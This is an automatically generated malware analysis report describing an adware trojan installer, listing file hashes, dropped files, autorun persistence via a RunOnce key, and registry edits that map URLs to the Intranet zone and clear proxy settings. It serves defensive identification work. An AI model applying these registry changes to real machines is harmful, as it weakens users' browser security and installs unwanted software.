Trojan.Generic.11726935_42c7df5771

by malwarelabrobot on April 30th, 2016 in Malware Descriptions.

not-a-virus:AdWare.Win32.ConvertAd.ajzv (Kaspersky), Trojan.Generic.11726935 (AdAware), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Adware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 42c7df5771aed3248e8f04ac2affda17
SHA1: 1d7f06dbf7acf03b9be4331d4db120c222c8f374
SHA256: 64ecd33aaed204813ae3748835013aff5a9737a4f4b32072becf631f24f4d783
SSDeep: 6144:uzfj/cK4AtXPDtUoaZDM16 tBdiTqwpnGrJ0X:0/N1ZowZtBATXnOW
Size: 308560 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:35
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

nsoA.tmp:240
Full_Setup.exe:1912
%original file name%.exe:856
nsg16.tmp:1164

The Trojan injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process nsoA.tmp:240 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Uninstall.exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8JST0V6P\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb19.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F89OK2Q0\Validate[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\tJEcW[1] (5952 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu11.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp12.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F89OK2Q0\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H9EA3RRE\vos_n[1].htm (977 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg16.tmp (5952 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoF.tmp (11755 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv14.tmp (977 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu10.tmp\inetc.dll (784 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsb19.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F89OK2Q0\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu10.tmp (0 bytes)

The process Full_Setup.exe:1912 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsdC.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdB.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss9.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoA.tmp (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss8.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F89OK2Q0\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjD.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn7.tmp (6720 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss9.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F89OK2Q0\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjD.tmp (0 bytes)

The process %original file name%.exe:856 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsd3.tmp\t1.dll (4 bytes)
%Documents and Settings%\%current user%\Application Data\InstallW\Full_Setup.exe (16664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F89OK2Q0\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8JST0V6P\0[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8JST0V6P\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb5.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl17.tmp (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H9EA3RRE\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8JST0V6P\r[1].htm (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H9EA3RRE\CAEJCTMN.htm (16664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw18.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd3.tmp\IpConfig.dll (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H9EA3RRE\r[1].htm (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\InstallW\Uninstall.exe (2967 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\CAW1QV4X.htm (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F89OK2Q0\0[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd3.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa13.tmp (43 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@histats[1].txt (199 bytes)
%Documents and Settings%\%current user%\Application Data\InstallW\Resume.exe (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq15.tmp (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\0[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd3.tmp\WmiInspector.dll (3616 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn4.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp (9120 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsl17.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq15.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa13.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw18.tmp (0 bytes)

The process nsg16.tmp:1164 makes changes in the file system.
The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsx1A.tmp (0 bytes)

Registry activity

The process nsoA.tmp:240 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "91 09 52 BF 70 EC 4B 64 A2 6F 47 D8 47 2C 99 E2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process Full_Setup.exe:1912 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "61 A0 EE 3E EA FF EC ED 9E E5 55 43 99 D5 13 B5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:856 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Resume]
"DisplayName" = "Installer Package"

"Publisher" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Resume]
"DisplayVersion" = "1.0.0.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Resume]
"UninstallString" = "%Documents and Settings%\%current user%\Application Data\InstallW\uninstall.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Resume]
"DisplayIcon" = "%Documents and Settings%\%current user%\Application Data\InstallW\uninstall.exe"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6D 81 A8 B8 DE 6F 45 39 9D 06 7C F8 B7 83 15 F9"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"Finalize" = "%Documents and Settings%\%current user%\Application Data\InstallW\Full_Setup.exe /runonce"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process nsg16.tmp:1164 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "89 1B 75 21 A0 FB C6 32 EF B8 1E 34 62 03 0E E5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

Dropped PE files

MD5 File path
fb33b9c5234606a7dbf9247e01e8f86a c:\Documents and Settings\"%CurrentUserName%"\Application Data\InstallW\Full_Setup.exe
ebce0562cbf6067824e005841744d1cf c:\Documents and Settings\"%CurrentUserName%"\Application Data\InstallW\Uninstall.exe
2a5f246b97d00f77b78d15f72923839b c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Uninstall.exe
a3ed6f7ea493b9644125d494fbf9a1e6 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd3.tmp\IpConfig.dll
8531346d16fa5d4768f6530d2eb2b65c c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd3.tmp\WmiInspector.dll
f02155fa3e59a8fc48a74a236b2bb42e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd3.tmp\inetc.dll
058ba8a0916d957d3b91d08ea2e876e2 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd3.tmp\t1.dll
bb25f5faf1d2329cbad8b763695bc518 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsg16.tmp
8501f079ef3fc63721d0164b8a34b4a9 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsoA.tmp
f02155fa3e59a8fc48a74a236b2bb42e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsu10.tmp\inetc.dll
bb25f5faf1d2329cbad8b763695bc518 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\tJEcW[1]
2a5f246b97d00f77b78d15f72923839b c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\F89OK2Q0\Validate[1].exe
fb33b9c5234606a7dbf9247e01e8f86a c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\H9EA3RRE\CAEJCTMN.htm

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name: setup
Product Version: 1.0.0.0
Legal Copyright: Copyright 2013
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description:
Comments:
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 23462 23552 4.51398 9d64b6ac6eb1aa41e38f6cc8798b652e
.rdata 28672 4496 4608 3.59163 f179218a059068529bdb4637ef5fa28e
.data 36864 3774424 1024 3.26654 af685ae5a632e08acd6c90a62cdfc3bb
.ndata 3813376 73728 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 3887104 17192 17408 4.11146 9744c9d8118bab5893d7e4c284c0adee

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 843
9e690e54fcaaec9e5ab149fdc7b39849
358c5cfa475c092625893377a53bb4b4
65a8ed347f955dc5b0cc72cd41edbda0
0474bc4cdbf6ebb28c41f29f08aff838
56f0773f477f9cd0340c0be299733fec
7d55f8587b19fc4f736b5142fafbf7d4
5ce92582e1a08a0ff321f9340e1050e4
94eefef5bbfc51c6b58cdd78d4d23a60
7360f94503b83a0a7583e4dd3b1a5da7
cead8cb9974398d8a97f11ecadffa99d
5c970638dc1d11b78456803966700f51
32781edd5bd0b472be7f9f3e7b066c17
680a542ac63edbf9b931b5db42883fb1
465c622d673d1c58e5bf257e4474113d
86772153d906b98a65d9a64a910117f6
13ddb0d6ec6ed13888cf211634187f29
00a69d79ba73b543914470b9087a11e8
4f2b2e2301f662eb0c2ef92d267711d2
8bf2fb9cdba8e11b9c67885900eb82d6
67df116b398f91b64eeab7c6fc280bb7
6f377cd73cbf924b48ba52c335a47c78
d4db355aaebca07562d248ae8b8c5635
2ef26b587dab0f74352943849596f24e
150711d4ed93d249436d8e851a9698e7
38aef307050ce93a00fd647bc1b34ef0

URLs

URL IP
